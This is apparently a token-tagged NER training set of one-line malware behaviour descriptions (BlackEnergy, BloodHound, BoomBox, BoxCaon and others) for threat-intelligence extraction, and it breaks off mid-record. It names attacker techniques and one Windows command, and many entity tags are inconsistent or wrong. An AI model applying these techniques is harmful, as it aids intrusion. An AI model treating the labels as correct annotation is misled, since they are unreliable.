"network", - "with", - "the", - "use", - "of", - "`cmd.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "use", - "Windows", - "commands", - "such", - "as", - "`fsutil", - "behavior", - "set", - "SymLinkEvaluation", - "R2L:1`", - "to", - "redirect", - "file", - "system", - "access", - "to", - "a", - "different", - "location", - "after", - "gaining", - "access", - "into", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "use", - "`wmic.exe`", - "to", - "delete", - "shadow", - "copies", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "attempts", - "to", - "bypass", - "default", - "User", - "Access", - "Control", - "(UAC)", - "settings", - "by", - "exploiting", - "a", - "backward-compatibility", - "setting", - "found", - "in", - "Windows", - "7", - "and", - "later." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "BlackEnergy", - "component", - "KillDisk", - "is", - "capable", - "of", - "deleting", - "Windows", - "Event", - "Logs." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "enabled", - "the", - "<code>TESTSIGNING</code>", - "boot", - "configuration", - "option", - "to", - "facilitate", - "loading", - "of", - "a", - "driver", - "component." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "used", - "a", - "plug-in", - "to", - "gather", - "credentials", - "stored", - "in", - "files", - "on", - "the", - "host", - "by", - "various", - "software", - "programs,", - "including", - "The", - "Bat!", - "email", - "client,", - "Outlook,", - "and", - "Windows", - "Credential", - "Store." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "used", - "a", - "plug-in", - "to", - "gather", - "credentials", - "from", - "web", - "browsers", - "including", - "FireFox,", - "Google", - "Chrome,", - "and", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "2", - "contains", - "a", - "\"Destroy\"", - "plug-in", - "that", - "destroys", - "data", - "stored", - "on", - "victim", - "hard", - "drives", - "by", - "overwriting", - "file", - "contents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "injects", - "its", - "DLL", - "component", - "into", - "svchost.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "the", - "capability", - "to", - "communicate", - "over", - "a", - "backup", - "channel", - "via", - "plus.google.com." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "gathers", - "a", - "list", - "of", - "installed", - "apps", - "from", - "the", - "uninstall", - "program", - "Registry.", - "It", - "also", - "gathers", - "registered", - "mail,", - "browser,", - "and", - "instant", - "messaging", - "clients", - "from", - "the", - "Registry.", - "BlackEnergy", - "has", - "searched", - "for", - "given", - "file", - "types." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "removed", - "the", - "watermark", - "associated", - "with", - "enabling", - "the", - "<code>TESTSIGNING</code>", - "boot", - "configuration", - "option", - "by", - "removing", - "the", - "relevant", - "strings", - "in", - "the", - "<code>user32.dll.mui</code>", - "of", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "run", - "a", - "keylogger", - "plug-in", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "conducted", - "port", - "scans", - "on", - "a", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "can", - "gather", - "very", - "specific", - "information", - "about", - "attached", - "USB", - "devices,", - "to", - "include", - "device", - "instance", - "ID", - "and", - "drive", - "geometry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "gathered", - "a", - "process", - "list", - "by", - "using", - "Tasklist.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "BlackEnergy", - "3", - "variant", - "drops", - "its", - "main", - "DLL", - "component", - "and", - "then", - "creates", - "a", - ".lnk", - "shortcut", - "to", - "that", - "file", - "in", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "run", - "a", - "plug-in", - "on", - "a", - "victim", - "to", - "spread", - "through", - "the", - "local", - "network", - "by", - "using", - "PsExec", - "and", - "accessing", - "admin", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "is", - "capable", - "of", - "taking", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "One", - "variant", - "of", - "BlackEnergy", - "locates", - "existing", - "driver", - "services", - "that", - "have", - "been", - "disabled", - "and", - "drops", - "its", - "driver", - "component", - "into", - "one", - "of", - "those", - "service's", - "paths,", - "replacing", - "the", - "legitimate", - "executable.", - "The", - "malware", - "then", - "sets", - "the", - "hijacked", - "service", - "to", - "start", - "automatically", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "BlackEnergy", - "3", - "variant", - "drops", - "its", - "main", - "DLL", - "component", - "and", - "then", - "creates", - "a", - ".lnk", - "shortcut", - "to", - "that", - "file", - "in", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "used", - "Systeminfo", - "to", - "gather", - "the", - "OS", - "version,", - "as", - "well", - "as", - "information", - "on", - "the", - "system", - "configuration,", - "BIOS,", - "the", - "motherboard,", - "and", - "the", - "processor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "gathered", - "information", - "about", - "network", - "IP", - "configurations", - "using", - "ipconfig.exe", - "and", - "about", - "routing", - "tables", - "using", - "route.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BlackEnergy", - "has", - "gathered", - "information", - "about", - "local", - "network", - "connections", - "using", - "netstat." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BlackEnergy", - "communicates", - "with", - "its", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "A", - "BlackEnergy", - "2", - "plug-in", - "uses", - "WMI", - "to", - "gather", - "victim", - "host", - "details." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "variant", - "of", - "BlackEnergy", - "creates", - "a", - "new", - "service", - "using", - "either", - "a", - "hard-coded", - "or", - "randomly", - "generated", - "name." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "can", - "copy", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "has", - "the", - "ability", - "to", - "find", - "files", - "on", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "can", - "enumerate", - "local", - "drives", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "can", - "send", - "commands", - "to", - "C2", - "in", - "the", - "body", - "of", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackMould", - "can", - "run", - "cmd.exe", - "with", - "parameters." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "compress", - "data", - "collected", - "by", - "its", - "SharpHound", - "ingestor", - "into", - "a", - "ZIP", - "file", - "to", - "be", - "written", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "collect", - "information", - "about", - "domain", - "users,", - "including", - "identification", - "of", - "domain", - "admin", - "accounts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "collect", - "information", - "about", - "domain", - "groups", - "and", - "members." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "has", - "the", - "ability", - "to", - "map", - "domain", - "trusts", - "and", - "identify", - "misconfigurations", - "for", - "potential", - "abuse." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "has", - "the", - "ability", - "to", - "collect", - "local", - "admin", - "information", - "via", - "GPO." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "identify", - "users", - "with", - "local", - "administrator", - "rights." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "collect", - "information", - "about", - "local", - "groups", - "and", - "members." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "use", - ".NET", - "API", - "calls", - "in", - "the", - "SharpHound", - "ingestor", - "component", - "to", - "pull", - "Active", - "Directory", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "collect", - "password", - "policy", - "information", - "on", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "use", - "PowerShell", - "to", - "pull", - "Active", - "Directory", - "information", - "from", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "enumerate", - "and", - "collect", - "the", - "properties", - "of", - "domain", - "computers,", - "including", - "domain", - "controllers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BloodHound", - "can", - "collect", - "information", - "on", - "user", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "create", - "bind", - "and", - "reverse", - "shells", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "has", - "maliciously", - "altered", - "the", - "OpenSSH", - "binary", - "on", - "targeted", - "systems", - "to", - "create", - "a", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "download", - "additional", - "modules", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "use", - "the", - "<code>ps</code>", - "command", - "to", - "discover", - "other", - "cryptocurrency", - "miners", - "active", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "download", - "an", - "additional", - "module", - "which", - "has", - "a", - "cryptocurrency", - "mining", - "extension." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "XOR-encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "has", - "discovered", - "the", - "OS", - "version,", - "CPU", - "model,", - "and", - "RAM", - "size", - "of", - "the", - "system", - "it", - "has", - "been", - "installed", - "on." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "can", - "find", - "the", - "external", - "IP", - "address", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bonadan", - "has", - "discovered", - "the", - "username", - "of", - "the", - "user", - "running", - "the", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "decrypt", - "AES-encrypted", - "files", - "downloaded", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "has", - "the", - "ability", - "to", - "execute", - "an", - "LDAP", - "query", - "to", - "enumerate", - "the", - "distinguished", - "name,", - "SAM", - "account", - "name,", - "and", - "display", - "name", - "for", - "all", - "domain", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "execute", - "an", - "LDAP", - "query", - "to", - "discover", - "e-mail", - "accounts", - "for", - "domain", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "check", - "its", - "current", - "working", - "directory", - "and", - "for", - "the", - "presence", - "of", - "a", - "specific", - "file", - "and", - "terminate", - "if", - "specific", - "values", - "are", - "not", - "found." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "upload", - "data", - "to", - "dedicated", - "per-victim", - "folders", - "in", - "Dropbox." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "search", - "for", - "specific", - "files", - "and", - "directories", - "on", - "a", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "has", - "the", - "ability", - "to", - "download", - "next", - "stage", - "malware", - "components", - "to", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "has", - "gained", - "execution", - "through", - "user", - "interaction", - "with", - "a", - "malicious", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "has", - "the", - "ability", - "to", - "mask", - "malicious", - "data", - "strings", - "as", - "PDF", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "encrypt", - "data", - "using", - "AES", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "establish", - "persistence", - "by", - "writing", - "the", - "Registry", - "value", - "<code>MicroNativeCacheSvc</code>", - "to", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "use", - "RunDLL32", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "enumerate", - "the", - "hostname,", - "domain,", - "and", - "IP", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "enumerate", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "has", - "used", - "HTTP", - "POST", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoomBox", - "can", - "download", - "files", - "from", - "Dropbox", - "using", - "a", - "hardcoded", - "access", - "token." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "has", - "used", - "DropBox", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "established", - "persistence", - "by", - "setting", - "the", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\load</code>", - "registry", - "key", - "to", - "point", - "to", - "its", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "can", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "uploads", - "files", - "and", - "data", - "from", - "a", - "compromised", - "host", - "over", - "the", - "existing", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "has", - "the", - "capability", - "to", - "download", - "folders'", - "contents", - "on", - "the", - "system", - "and", - "upload", - "the", - "results", - "back", - "to", - "its", - "Dropbox", - "drive." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "has", - "searched", - "for", - "files", - "on", - "the", - "system,", - "such", - "as", - "documents", - "located", - "in", - "the", - "desktop", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "can", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "has", - "created", - "a", - "working", - "folder", - "for", - "collected", - "files", - "that", - "it", - "sends", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "has", - "used", - "Windows", - "API", - "calls", - "to", - "obtain", - "information", - "about", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "used", - "the", - "\"StackStrings\"", - "obfuscation", - "technique", - "to", - "hide", - "malicious", - "functionalities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "can", - "collect", - "the", - "victim's", - "MAC", - "address", - "by", - "using", - "the", - "<code>GetAdaptersInfo</code>", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BoxCaon", - "can", - "execute", - "arbitrary", - "commands", - "and", - "utilize", - "the", - "\"ComSpec\"", - "environment", - "variable." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "terminates", - "antimalware", - "processes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Brave", - "Prince", - "variants", - "have", - "used", - "South", - "Korea's", - "Daum", - "email", - "service", - "to", - "exfiltrate", - "information,", - "and", - "later", - "variants", - "have", - "posted", - "the", - "data", - "to", - "a", - "web", - "server", - "via", - "an", - "HTTP", - "post", - "command." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Area", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "gathers", - "file", - "and", - "directory", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "lists", - "the", - "running", - "processes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "gathers", - "information", - "about", - "the", - "Registry." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "collects", - "hard", - "drive", - "content", - "and", - "system", - "configuration", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brave", - "Prince", - "gathers", - "network", - "configuration", - "information", - "as", - "well", - "as", - "the", - "ARP", - "cache." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Briba", - "downloads", - "files", - "onto", - "infected", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Briba", - "creates", - "run", - "key", - "Registry", - "entries", - "pointing", - "to", - "malicious", - "DLLs", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Briba", - "uses", - "rundll32", - "within", - "Registry", - "Run", - "Keys", - "/", - "Startup", - "Folder", - "entries", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 